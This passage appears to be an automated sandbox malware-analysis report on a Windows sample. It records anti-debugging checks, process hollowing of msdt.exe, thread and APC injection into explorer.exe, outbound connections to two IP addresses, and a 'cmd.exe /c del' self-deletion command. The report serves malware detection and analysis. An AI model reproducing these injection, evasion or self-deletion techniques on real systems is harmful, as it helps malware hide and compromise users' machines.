          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534DB60 mov ecx, dword ptr fs:[00000030h]14_2_0534DB60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540131B mov eax, dword ptr fs:[00000030h]14_2_0540131B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534F358 mov eax, dword ptr fs:[00000030h]14_2_0534F358
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534DB40 mov eax, dword ptr fs:[00000030h]14_2_0534DB40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05374BAD mov eax, dword ptr fs:[00000030h]14_2_05374BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05374BAD mov eax, dword ptr fs:[00000030h]14_2_05374BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05374BAD mov eax, dword ptr fs:[00000030h]14_2_05374BAD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372397 mov eax, dword ptr fs:[00000030h]14_2_05372397
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537B390 mov eax, dword ptr fs:[00000030h]14_2_0537B390
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05351B8F mov eax, dword ptr fs:[00000030h]14_2_05351B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05351B8F mov eax, dword ptr fs:[00000030h]14_2_05351B8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053FD380 mov ecx, dword ptr fs:[00000030h]14_2_053FD380
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540138A mov eax, dword ptr fs:[00000030h]14_2_0540138A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053703E2 mov eax, dword ptr fs:[00000030h]14_2_053703E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053703E2 mov eax, dword ptr fs:[00000030h]14_2_053703E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053703E2 mov eax, dword ptr fs:[00000030h]14_2_053703E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053703E2 mov eax, dword ptr fs:[00000030h]14_2_053703E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053703E2 mov eax, dword ptr fs:[00000030h]14_2_053703E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053703E2 mov eax, dword ptr fs:[00000030h]14_2_053703E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536DBE9 mov eax, dword ptr fs:[00000030h]14_2_0536DBE9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05415BA5 mov eax, dword ptr fs:[00000030h]14_2_05415BA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C53CA mov eax, dword ptr fs:[00000030h]14_2_053C53CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C53CA mov eax, dword ptr fs:[00000030h]14_2_053C53CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05384A2C mov eax, dword ptr fs:[00000030h]14_2_05384A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05384A2C mov eax, dword ptr fs:[00000030h]14_2_05384A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540EA55 mov eax, dword ptr fs:[00000030h]14_2_0540EA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534AA16 mov eax, dword ptr fs:[00000030h]14_2_0534AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534AA16 mov eax, dword ptr fs:[00000030h]14_2_0534AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05418A62 mov eax, dword ptr fs:[00000030h]14_2_05418A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05345210 mov eax, dword ptr fs:[00000030h]14_2_05345210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05345210 mov ecx, dword ptr fs:[00000030h]14_2_05345210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05345210 mov eax, dword ptr fs:[00000030h]14_2_05345210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05345210 mov eax, dword ptr fs:[00000030h]14_2_05345210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05363A1C mov eax, dword ptr fs:[00000030h]14_2_05363A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05358A0A mov eax, dword ptr fs:[00000030h]14_2_05358A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0538927A mov eax, dword ptr fs:[00000030h]14_2_0538927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540AA16 mov eax, dword ptr fs:[00000030h]14_2_0540AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540AA16 mov eax, dword ptr fs:[00000030h]14_2_0540AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053FB260 mov eax, dword ptr fs:[00000030h]14_2_053FB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053FB260 mov eax, dword ptr fs:[00000030h]14_2_053FB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053D4257 mov eax, dword ptr fs:[00000030h]14_2_053D4257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349240 mov eax, dword ptr fs:[00000030h]14_2_05349240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349240 mov eax, dword ptr fs:[00000030h]14_2_05349240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349240 mov eax, dword ptr fs:[00000030h]14_2_05349240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349240 mov eax, dword ptr fs:[00000030h]14_2_05349240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535AAB0 mov eax, dword ptr fs:[00000030h]14_2_0535AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535AAB0 mov eax, dword ptr fs:[00000030h]14_2_0535AAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537FAB0 mov eax, dword ptr fs:[00000030h]14_2_0537FAB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053452A5 mov eax, dword ptr fs:[00000030h]14_2_053452A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053452A5 mov eax, dword ptr fs:[00000030h]14_2_053452A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053452A5 mov eax, dword ptr fs:[00000030h]14_2_053452A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053452A5 mov eax, dword ptr fs:[00000030h]14_2_053452A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053452A5 mov eax, dword ptr fs:[00000030h]14_2_053452A5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537D294 mov eax, dword ptr fs:[00000030h]14_2_0537D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537D294 mov eax, dword ptr fs:[00000030h]14_2_0537D294
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372AE4 mov eax, dword ptr fs:[00000030h]14_2_05372AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372ACB mov eax, dword ptr fs:[00000030h]14_2_05372ACB
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.0.217.44 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1300000Jump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess created: C:\Users\user\Desktop\86dXpRWnFG.exe C:\Users\user\Desktop\86dXpRWnFG.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\86dXpRWnFG.exe'Jump to behavior
          Source: explorer.exe, 0000000A.00000002.913447841.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 0000000A.00000000.741149952.0000000001080000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.914669153.0000000003A80000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000A.00000000.741149952.0000000001080000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.914669153.0000000003A80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.741149952.0000000001080000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.914669153.0000000003A80000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.741149952.0000000001080000.00000002.00000001.sdmp, msdt.exe, 0000000E.00000002.914669153.0000000003A80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.763244737.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Users\user\Desktop\86dXpRWnFG.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
